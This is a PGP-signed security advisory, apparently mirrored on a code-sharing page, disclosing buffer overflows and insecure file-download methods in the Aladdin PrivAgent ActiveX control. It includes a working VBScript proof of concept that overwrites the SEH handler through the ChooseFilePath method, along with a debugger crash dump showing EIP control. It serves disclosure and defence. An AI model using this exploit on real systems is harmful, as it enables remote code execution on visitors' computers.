扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================================= FILE INFO: ============================================================================================= Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Remote Vulnerabilities File: PrivAgent.ocx InternalName: PrivAgentAx OriginalFilename: PrivAgent.ocx FileVersion:2.0.0.0 FileDescription:PrivAgent ActiveX Control Product:Privilege ProductVersion: 02.0 Debug:False Patched:False PreRelease: False PrivateBuild: True SpecialBuild: False Language: English (United States) MD5 hash: c96dfc282b6bdc177abd076a9bb94933 ============================================================================================= OBJECT SAFETY REPORT: ============================================================================================= CLSID:{09F68A41-2FBE-11D3-8C9D-0008C7D901B6} ProgID: PrivAgentAx.PrivAgent.1 Description:PrivAgent Class RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False ============================================================================================= TESTED ON: ============================================================================================= Windows XP Professional SP3 Windows 7 Professional SP3 ============================================================================================= DOWNLOADABLE FROM: ============================================================================================= ftp://ftp.aladdin.com//pub/privilege/activex2002.zip ============================================================================================= BUG INFO: ============================================================================================= This ocx seems to be really poor coded. I've found so many errors that I felt too choosy (yes Mrs. Elsa Fornero, I AM choosy and I AM proud of it) to test any other method. Below there's a list of stack-based buffer overflow, insecure file download and a proof of concept which exploits a good old fashioned (or trivial, if you like) stack based buffer overflow, triggered simply passing to the "ChooseFilePath" method a string longer than 268 bytes. In this case, after a memory reading exception, we are in full control of EIP. Here it is the list of vulnerable methods, guess which ones are vulnerable to arbitrary file download? :) #1 Function DownloadLicense ( ByVal sURLAs String , ByVal sPathAs String , ByVal bInstallAs Boolean )As Long #2 Function ChooseFilePath ( ByVal sFileNameAs String )As String #3 Function InstallLicense ( ByVal szLicensePathAs String )As Long #4 Function InstallPrivilege ( ByVal szInstFilePathAs String )As Long #4 Function DownloadPrivilege ( ByVal szURLAs String , ByVal szTargetDirAs String , ByVal bInstallAs Boolean )As Long #4 Function InstallDevExt ( ByVal szDevExtPathAs String )As Long #5 Function DownloadDevExt ( ByVal szURLAs String , ByVal szTargetPathAs String , ByVal bInstallAs Boolean )As Long ============================================================================================= PROOF OF CONCEPT: ============================================================================================= <html> <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object> <script language = 'vbscript'> buffer= String(268, "A") getEIP= unescape("bbbb") buffer_2= "CCCCCCCC" exception = unescape("%5A%0B%02%10") '0x10020B5A pop ESI-pop-ret from PrivAgent.ocx buffer_3= unescape("EEEE" + String(2712, "F")) test.ChooseFilePath buffer + getEIP + buffer_2 + exception + buffer_3 </script> </html> ============================================================================================= CRASH DUMP: ============================================================================================= 0:005> g WARNING: Continuing a non-continuable exception (1138.1304): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=076886d8 ecx=00385f70 edx=086dc628 esi=0253cfa4 edi=0253cd24 eip=62626262 esp=0253cce4 ebp=41414141 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 62626262 ????? ============================================================================================= FIX: ============================================================================================= Set kill-bit to stop the activeX control ============================================================================================= -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iQIcBAEBAgAGBQJQijFXAAoJEJlK/ai8vywm9ooP/RTuGJMOI+t8SABs9y2BSUR4 oj59/J4zF/Ofw7Id/LN3MHAbqUVXWpUQBtjyjIPPGyAReVacn1lUScVhP11R1bRD bXbOUw+BU2pfvSmyFaVPQlLe+T6umHaFrEqpbIhgsJSARD8qOQPpd7crywzQXau0 fa/kf/tpK1tJ42A5gnCV7UybRb4mfmwcz46UfZY2mMYDPzBYInqZJ8+cAgaih/1k bdbti+Cpy9Pj+33I2q1YSnlMGqVjIKqT+FCfdVN1DL03/U/TjAeddcCz6fHxpu+t nuLWRrAV3CLrSQtYpluBBjASHer5/KzLFZBPZ8MOi97wA+C2oiOnMPbkNDQfjBn2 EzXnKn1hKNI20WBb48j3oqohQYAFksOu9MErWLekF/tvVkhywtM1qQFRrQrqLf5c xJl0DnbM4RiCOmOiAVYRAwTGhYnSsLUYrytO38JINS3TcdyeoZJrNHXcCzZrJJkl xmZ8Yqmq3xmEkPQ6YcEybJrzL9j1cFo4wJEkuggr9kEpgbg34N6oQn631QirEdN2 WUo9w02Rk4W5Jh637DojUjOru2aBA1aGxM92Db1X445dt+VdYhOUUdQVQC+X9xJm o0g8NWQSJtGQgTY/u/ZH8fpAcsGcij23Ktq+gc1ma0Sc5U89b64ny2YFsjWxmhcm NH/Cs44PsO755FWU917q =WA+e -----END PGP SIGNATURE----- |
体验盒子
